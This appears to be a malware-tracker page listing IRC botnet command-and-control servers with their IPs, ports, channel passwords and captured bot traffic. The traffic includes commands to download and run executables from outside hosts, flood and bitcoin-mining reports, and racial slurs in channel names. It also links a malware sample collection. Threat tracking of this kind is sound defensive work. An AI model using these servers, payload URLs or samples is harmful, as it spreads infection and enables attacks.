Resolved : [cash.hi5fotos.info] To [77.235.51.101] Remote Host Port Number 77.235.51.101 4042 PASS google_cache2.tmp NICK n[USA|XP]263051 USER 2630 “” “TsGh” :2630 JOIN #fixed# abc PONG 422 UPDATE: 77.235.51.101:81 Server Password: Username: 0298 Nickname: n[DEU|XP]967032 Channel: #msg# (Password: abc) Channeltopic: :!dl http://rapidshare.com/files/4077174557/mtm3.exe UPDATE: PASS google_cache2.tmp NICK [USA|XP]612840 USER 6128 “” “TsGh” :6128 NICK n[USA|XP]780243 USER 3028 “”Read more...
irc.FBI.net(linux bots hosted in France Ovh Systems)
Resolved : [irc-sbn.no-ip.info] To [46.105.185.99] 46.105.185.99:3301 chanel #rfi hosting infos: http://whois.domaintools.com/46.105.185.99
31.192.105.15(ngrBot hosted in Russian Federation Mir Telematiki Ltd)
Remote Host Port Number 213.251.170.52 80 74.117.178.4 80 31.192.105.15 1863 PASS ngrBot NICK n{US|XPa}acmejod USER acmejod 0 0 :acmejod JOIN #80t35ref 1963.g3rb3rs1t0.3691 JOIN #US JOIN #XP PRIVMSG #XP :[d=”http://dc227.4shared.com/download/d2yFF1wn/dafsdg.exe” s=”81920 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.exe” – Download retries: 0 UPDATE: NICK n{US|XPa}vcaofwk USER vcaofwk 0 0 :vcaofwk JOIN #80t35ref 1963.g3rb3rs1t0.3691 PRIVMSG #80t35ref :[d=”http://modelosregias.com/KLv313G.exe”Read more...
aLissmalatya.co.cc(irc botnet hosted in Netherlands Amsterdam Leaseweb B.v)
aLissmalatya.co.cc 85.17.175.200 Resolved : [cigara.co.cc] To [85.17.175.200] C&C Server: 85.17.175.200:6667 Server Password: Username: fojhrqj Nickname: [DEU|XP|793378] Channel: #!aLis! (Password: test) Channeltopic: Now talking in #!aLiS! Topic On: [ #!aLiS! ] [ .join #!5! ] Topic By: [ hAck ] Now talking in #!5! Topic On: [ #!5! ] [ ] Topic By: [ hAck ]Read more...
52mb malware samples
gbot,3vbot,aryanbot,ngrBot and alot of banking trojan samples in this collection Download: http://adf.ly/28yc5
77.241.199.113(aryan bot hosted in Lithuania Vilnius Uab Baltnetos Komunikacijos)
Remote Host Port Number 213.251.170.52 80 77.241.199.113 6999 PASS none NICK New{US-XP-x86}0030424 USER 0030424 “” “0030424” :0030424 MODE New{US-XP-x86}0030424 +iMm JOIN #bot123 none PONG 422 Now talking in #bot123 Topic On: [ #bot123 ] [ !udp.stop ] Topic By: [ troll2 ] (AryaN{RO-WN7-x86}2743701) [AryaN]: Terminated UDP Flood Thread (AryaN{SK-WN7-x64}5732818) [AryaN]: Terminated UDP Flood Thread (AryaN{NL-WN7-x64}6605476)Read more...
91.226.213.233(irc botnet hosted in Ukraine Pe Ivanov Vitaliy Sergeevich)
Remote Host Port Number 213.251.170.52 80 69.73.179.75 80 76.73.40.242 8332 91.226.213.233 8811 PONG :0x.9001 NICK n{US|XP_32a}jswxou USER jswxou 0 * :jswxou PONG :3CFF0039 JOIN #insomnia nigger PRIVMSG #insomnia :[BITCOIN]: Downloading ufasoft bitcoin miner… PRIVMSG #insomnia :[BITCOIN]: Mining started [user=’nigger’ url=’http://pool.bitclockers.com:8332′ proc=’dnmsal’ id=’1288′] hosting infos: http://whois.domaintools.com/91.226.213.233
tr.ro0t.tk(irc botnet hosted in United States Clifton Park Dotblock.com)
Remote Host Port Number 184.107.181.154 80 66.147.232.161 3131 NICK {XPUSA726474} JOIN #Machine PRIVMSG #Gulumse :.::[Visit]::. Visiting Website Now PRIVMSG #Gulumse :.::[Visit]::. URL visited. PONG tr.ro0t.tk USER COMPUTERNAME * 0 :COMPUTERNAME MODE {XPUSA726474} -ix UPDATE: NICK New{US-XP-x86}6862086 USER 6862086 “” “6862086” :6862086 MODE New{US-XP-x86}6862086 +iMm JOIN #FatmaGul none PRIVMSG #Gulumse :[AryaN]: Failed: Mis Parameter, Usage: visitRead more...
46.20.40.196(irc botnet hosted in Germany Myloc Managed It Ag)
Remote Host Port Number 213.251.170.52 80 46.20.40.196 9872 NICK n[US|XP_32a]spjsiy USER spjsiy 0 * :spjsiy PONG :9A42E0C2 JOIN #ngr noniggaz hosting infos: http://whois.domaintools.com/46.20.40.196
ab.sweetgrimescorn.com(irc botnet hosted in Malaysia Johor Bahru Piradius Net)
Remote Host Port Number 124.217.225.223 1866 NICK n[USA|XP|COMPUTERNAME]wglotbs USER hh “” “lol” :hh JOIN #!h! PONG 422 Now talking in #!h! Topic On: [ #!h! ] [ .load /99/106/112/81/55/59/40/104/125/126/121/121/116/115/116/104/98/122/125/113/96/121/108/65/86/113/123/127/36/116/118/103/47/112/47/69/121/102/ ] Topic By: [ x ] (x) .im /99/106/112/81/55/59/40/108/121/110/104/104/111/115/124/45/117/96/105/103/106/127/105/74/70/118/123/52/105/120/116/37/102/98/98/69/99/108/102/73/55/112/106/101/60/44/55/57/59/66/64/92/99/ hosting infos: http://whois.domaintools.com/124.217.225.223